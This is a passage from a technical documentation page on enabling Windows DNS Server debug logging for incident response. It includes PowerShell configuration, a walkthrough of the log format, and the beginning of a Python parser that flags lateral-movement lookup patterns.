13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Method 1: everything on, including full packet contents. Very noisy; use briefly during IR, not as a baseline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-DnsServerDiagnostics -All $true -ComputerName \"DNS01.corp.local\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Method 2: specific settings, a balance between detail and volume.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># A comment after a trailing backtick breaks the continuation (the command ends at the comment),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># so the settings are splatted from a hashtable instead.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dnsDiag = @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Queries        = $true                      # Log incoming queries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Answers        = $true                      # Log responses</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    SendPackets    = $true                      # Log sent packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ReceivePackets = $true                      # Log received packets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UdpPackets     = $true                      # A direction, a transport, a content type and a packet type</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TcpPackets     = $true                      # must all be selected or nothing is written</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LogFilePath    = 'C:\\DNSDebugLog\\dns.log'   # Directory must already exist</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    MaxMBFileSize  = 500                        # 500MB, then the file wraps and overwrites from the top: ship it off-box</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ComputerName   = 'DNS01.corp.local'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-DnsServerDiagnostics @dnsDiag</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify logging is active:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DnsServerDiagnostics -ComputerName \"DNS01.corp.local\" |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Queries, Answers, UdpPackets, TcpPackets, LogFilePath, MaxMBFileSize</span><br></span></code></pre></div></div>\n<p><strong>DNS debug log format and parsing:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 
12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Debug log summary line (one per packet when -Details is off):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Date Time ThreadID Context InternalPacketID Proto Snd/Rcv RemoteIP Xid R(response; blank for a query) Opcode [FlagsHex FlagChars RCODE] QType QName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Date and time follow the server locale (US-English servers write 11/15/2025 2:47:33 AM). Flag chars: A=AA D=RD T=TC R=RA</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">#</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Example entries from a lateral movement scenario:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">2025-11-15 02:47:33 0D4C PACKET  000000AA3F012345 UDP Rcv 10.10.5.42 6d43   Q [0001   D   NOERROR] A (6)TARGET(4)corp(5)local(0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">2025-11-15 02:47:33 0D4C PACKET  000000AA3F012345 UDP Snd 10.10.5.42 6d43 R Q [8081   DR  NOERROR] A (6)TARGET(4)corp(5)local(0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This shows: host 10.10.5.42 queried for TARGET.corp.local at 02:47:33 and received a NOERROR answer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The query and its response share the Xid (6d43) and packet ID; the query has a blank R column, the response an R</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The answer data (here 10.10.1.55) is NOT on the summary line: it appears only in the packet dump written with -Details $true</span><br></span></code></pre></div></div>\n<p><strong>Parse the DNS debug log for lateral movement indicators:</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 
16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">#!/usr/bin/env python3</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Parse Windows DNS Server debug log for lateral movement indicators.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">Looks for: internal IP clients resolving many internal hostnames (discovery pattern),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">clients resolving hostnames they've never queried before, burst query patterns.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> re</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token 
plain\"> sys</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> collections </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> defaultdict</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">parse_dns_debug_log</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Parse Windows DNS debug log and extract client-&gt;hostname query pairs.\"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Pattern for DNS debug log query lines</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    query_pattern </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> re</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">compile</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}).*?UDP Rcv\\s+([\\d\\.]+)\\s+\\w+\\s+Q\\s+\\[\\w+\\s+\\w+\\s+\\w+\\]\\s+(\\w+)\\s+(.+)'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> defaultdict</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># client_ip -&gt; 
[(timestamp, hostname, query_type)]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">log_path</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'r'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> encoding</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'utf-8'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> errors</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'replace'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> line </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span 
class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            m </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> query_pattern</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">search</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">line</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> m</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            ts_str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_type</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">,</span><span class=\"token plain\"> raw_hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> m</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">groups</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Only interested in internal clients querying internal names</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">not</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'172.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'192.168.'</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Clean up the hostname encoding: the debug log writes names in DNS wire format with label lengths, e.g. (3)www(7)example(3)com(0) -&gt; www.example.com</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            hostname </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> re</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sub</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">r'\\(\\d+\\)'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> raw_hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">try</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ts </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts_str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'%Y-%m-%d %H:%M:%S'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" 
style=\"color:hsl(356, 75%, 47%)\">except</span><span class=\"token plain\"> ValueError</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">continue</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">append</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> hostname</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_type</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> queries</span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">detect_lateral_movement_patterns</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> internal_prefix</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'10.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'172.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'192.168.'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"Analyze query patterns for lateral movement indicators.\"\"\"</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    findings </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> client_ip</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> query_list </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> queries</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">items</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sort by timestamp</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        
query_list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">key</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">lambda</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> x</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find bursts: &gt;30 unique internal hostnames resolved in 10 minutes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        internal_queries </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span 
class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> ts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> qt </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> query_list</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">any</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token plain\"> s </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.corp.local'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'.internal'</span><span class=\"token punctuation\" 
